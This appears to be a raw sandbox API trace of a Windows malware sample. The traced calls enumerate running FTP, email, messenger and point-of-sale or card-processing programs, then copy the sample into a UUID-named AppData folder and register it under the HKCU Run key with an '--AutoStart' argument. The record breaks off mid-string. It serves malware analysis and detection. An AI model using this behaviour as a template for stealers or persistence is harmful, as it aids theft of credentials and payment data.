[0140.781] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x3e0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0140.781] CloseHandle (hObject=0x3e0) returned 1 [0140.781] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x3e0 [0140.781] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.782] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x800000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0140.783] CloseHandle (hObject=0x3e0) returned 1 [0140.783] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3e0 [0140.783] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.784] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xb50000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0140.784] CloseHandle (hObject=0x3e0) returned 1 [0140.784] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5dc) returned 0x3e0 [0140.784] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.785] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x11b0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0140.786] CloseHandle (hObject=0x3e0) returned 1 [0140.786] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3d4) returned 0x3e0 [0140.786] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.787] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xa00000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0140.787] CloseHandle (hObject=0x3e0) returned 1 [0140.787] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e4) returned 0x3e0 [0140.787] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.788] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xf10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0140.788] CloseHandle (hObject=0x3e0) returned 1 [0140.789] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6dc) returned 0x3e0 [0140.789] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.790] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xaf0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0140.790] CloseHandle (hObject=0x3e0) returned 1 [0140.790] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b4) returned 0x3e0 [0140.790] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.791] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xeb0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0140.791] CloseHandle (hObject=0x3e0) returned 1 [0140.791] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x674) returned 0x3e0 [0140.791] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.793] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xfb0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0140.793] CloseHandle (hObject=0x3e0) returned 1 [0140.793] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x418) returned 0x3e0 [0140.793] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.794] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x3d0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0140.794] CloseHandle (hObject=0x3e0) returned 1 [0140.795] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5c4) returned 0x3e0 [0140.795] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.796] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xe60000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0140.796] CloseHandle (hObject=0x3e0) returned 1 [0140.796] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x3e0 [0140.796] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.797] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x160000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0140.797] CloseHandle (hObject=0x3e0) returned 1 [0140.797] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x81c) returned 0x3e0 [0140.797] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.798] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x11e0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0140.799] CloseHandle (hObject=0x3e0) returned 1 [0140.799] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x3e0 [0140.799] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.800] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xba0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0140.800] CloseHandle (hObject=0x3e0) returned 1 [0140.800] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x3e0 [0140.800] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.801] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x1280000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0140.801] CloseHandle (hObject=0x3e0) returned 1 [0140.802] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x3e0 [0140.802] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.803] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xf20000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0140.803] CloseHandle (hObject=0x3e0) returned 1 [0140.803] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x3e0 [0140.803] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.804] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x11c0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0140.805] CloseHandle (hObject=0x3e0) returned 1 [0140.805] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x3e0 [0140.805] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.806] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x220000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0140.806] CloseHandle (hObject=0x3e0) returned 1 [0140.806] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x87c) returned 0x3e0 [0140.806] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.807] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xe70000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0140.808] CloseHandle (hObject=0x3e0) returned 1 [0140.808] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x3e0 [0140.808] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.809] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x1020000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0140.809] CloseHandle (hObject=0x3e0) returned 1 [0140.809] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x89c) returned 0x3e0 [0140.809] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.810] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x220000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0140.810] CloseHandle (hObject=0x3e0) returned 1 [0140.811] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x3e0 [0140.811] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.812] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x90000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0140.812] CloseHandle (hObject=0x3e0) returned 1 [0140.812] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x3e0 [0140.812] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.813] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x11c0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0140.814] CloseHandle (hObject=0x3e0) returned 1 [0140.814] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x3e0 [0140.814] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.815] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x1270000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0140.815] CloseHandle (hObject=0x3e0) returned 1 [0140.815] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e0) returned 0x3e0 [0140.815] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.816] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x8f0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0140.817] CloseHandle (hObject=0x3e0) returned 1 [0140.817] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f4) returned 0x3e0 [0140.817] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.818] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x1190000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0140.818] CloseHandle (hObject=0x3e0) returned 1 [0140.818] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x3e0 [0140.818] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.820] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xbd0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0140.820] CloseHandle (hObject=0x3e0) returned 1 [0140.820] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x914) returned 0x3e0 [0140.820] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.822] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x12e0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0140.822] CloseHandle (hObject=0x3e0) returned 1 [0140.822] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x3e0 [0140.822] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.823] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x11f0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0140.824] CloseHandle (hObject=0x3e0) returned 1 [0140.824] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x3e0 [0140.824] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.825] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xe80000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0140.825] CloseHandle (hObject=0x3e0) returned 1 [0140.825] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x3e0 [0140.825] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.826] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xb70000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0140.827] CloseHandle (hObject=0x3e0) returned 1 [0140.827] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x3e0 [0140.827] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.828] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xcc0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0140.828] CloseHandle (hObject=0x3e0) returned 1 [0140.828] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x3e0 [0140.828] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.829] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xc10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0140.830] CloseHandle (hObject=0x3e0) returned 1 [0140.830] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x3e0 [0140.830] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.831] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xa20000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0140.831] CloseHandle (hObject=0x3e0) returned 1 [0140.831] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x984) returned 0x3e0 [0140.831] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.832] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x1000000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0140.832] CloseHandle (hObject=0x3e0) returned 1 [0140.833] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x994) returned 0x3e0 [0140.833] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.834] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x12e0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0140.834] CloseHandle (hObject=0x3e0) returned 1 [0140.834] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a4) returned 0x3e0 [0140.834] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.836] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x1b0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="consolidationbeside.exe") returned 0x17 [0140.836] CloseHandle (hObject=0x3e0) returned 1 [0140.836] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b4) returned 0x3e0 [0140.836] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.838] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xd70000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="mrs-manitoba.exe") returned 0x10 [0140.838] CloseHandle (hObject=0x3e0) returned 1 [0140.838] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x3e0 [0140.838] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.840] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x12b0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="internationally-seasonal.exe") returned 0x1c [0140.841] CloseHandle (hObject=0x3e0) returned 1 [0140.841] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x0 [0140.841] CloseHandle (hObject=0x0) returned 0 [0140.841] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa2c) returned 0x0 [0140.841] CloseHandle (hObject=0x0) returned 0 [0140.841] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x940) returned 0x0 [0140.841] CloseHandle (hObject=0x0) returned 0 [0140.841] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa7c) returned 0x0 [0140.841] CloseHandle (hObject=0x0) returned 0 [0140.842] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x414) returned 0x3e0 [0140.842] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.843] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x400000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="OnB5h0yX46mreVq4.exe") returned 0x14 [0140.844] CloseHandle (hObject=0x3e0) returned 1 [0140.844] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7ac) returned 0x0 [0140.844] CloseHandle (hObject=0x0) returned 0 [0140.844] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x0 [0140.844] CloseHandle (hObject=0x0) returned 0 [0140.853] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x28) returned 0xa19ba0 [0140.853] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x25c) returned 0xa4b088 [0140.853] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x25c) returned 0x3568a70 [0140.854] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x25c) returned 0x3562d60 [0140.854] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x25c) returned 0x3577ec8 [0140.854] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x25c) returned 0xa52a68 [0140.854] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x25c) returned 0xa52cd0 [0140.854] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x25c) returned 0xa4b788 [0140.854] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x25c) returned 0xa4b9f0 [0140.854] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x25c) returned 0xa5b1a8 [0140.854] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x25c) returned 0xa5b410 [0140.882] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18de00 | out: phkResult=0x18de00*=0x3e0) returned 0x0 [0140.882] RegQueryValueExW (in: hKey=0x3e0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18ddfc, lpData=0x18c528, lpcbData=0x18dde0*=0x400 | out: lpType=0x18ddfc*=0x0, lpData=0x18c528*=0x0, lpcbData=0x18dde0*=0x400) returned 0x2 [0140.883] RegCloseKey (hKey=0x3e0) returned 0x0 [0140.883] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0140.883] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0140.884] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" " [0140.884] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" ", pNumArgs=0x18ddc4 | out: pNumArgs=0x18ddc4) returned 0xa39898*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" [0140.884] lstrcpyW (in: lpString1=0x18bd28, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" [0140.884] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe") returned="OnB5h0yX46mreVq4.exe" [0140.884] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d528 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0140.884] UuidCreate (in: Uuid=0x18dd74 | out: Uuid=0x18dd74) returned 0x0 [0140.884] UuidToStringW (in: Uuid=0x18dd74, StringUuid=0x18de08 | out: StringUuid=0x18de08) returned 0x0 [0140.884] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x50) returned 0x35ae130 [0140.884] RpcMgmtStatsVectorFree (in: StatsVector=0x18de08 | out: StatsVector=0x18de08) returned 0x0 [0140.884] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="ea2f22f9-d502-4d6e-b556-7aab02299e6c" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c") returned 1 [0140.885] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c"), lpSecurityAttributes=0x0) returned 1 [0140.886] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xb0) returned 0x3521740 [0140.886] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xb0) returned 0x35218b0 [0140.886] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c", pMore="OnB5h0yX46mreVq4.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe") returned 1 [0140.886] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\onb5h0yx46mrevq4.exe")) returned 0 [0140.886] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onb5h0yx46mrevq4.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\onb5h0yx46mrevq4.exe"), bFailIfExists=0) returned 1 [0140.959] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18de04 | out: phkResult=0x18de04*=0x5c4) returned 0x0 [0140.959] lstrcpyW (in: lpString1=0x18cd28, lpString2="\"" | out: lpString1="\"") returned="\"" [0140.959] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe" [0140.959] lstrcatW (in: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --AutoStart") returned="\"C:\\Users\\5p5NrGJn0jS 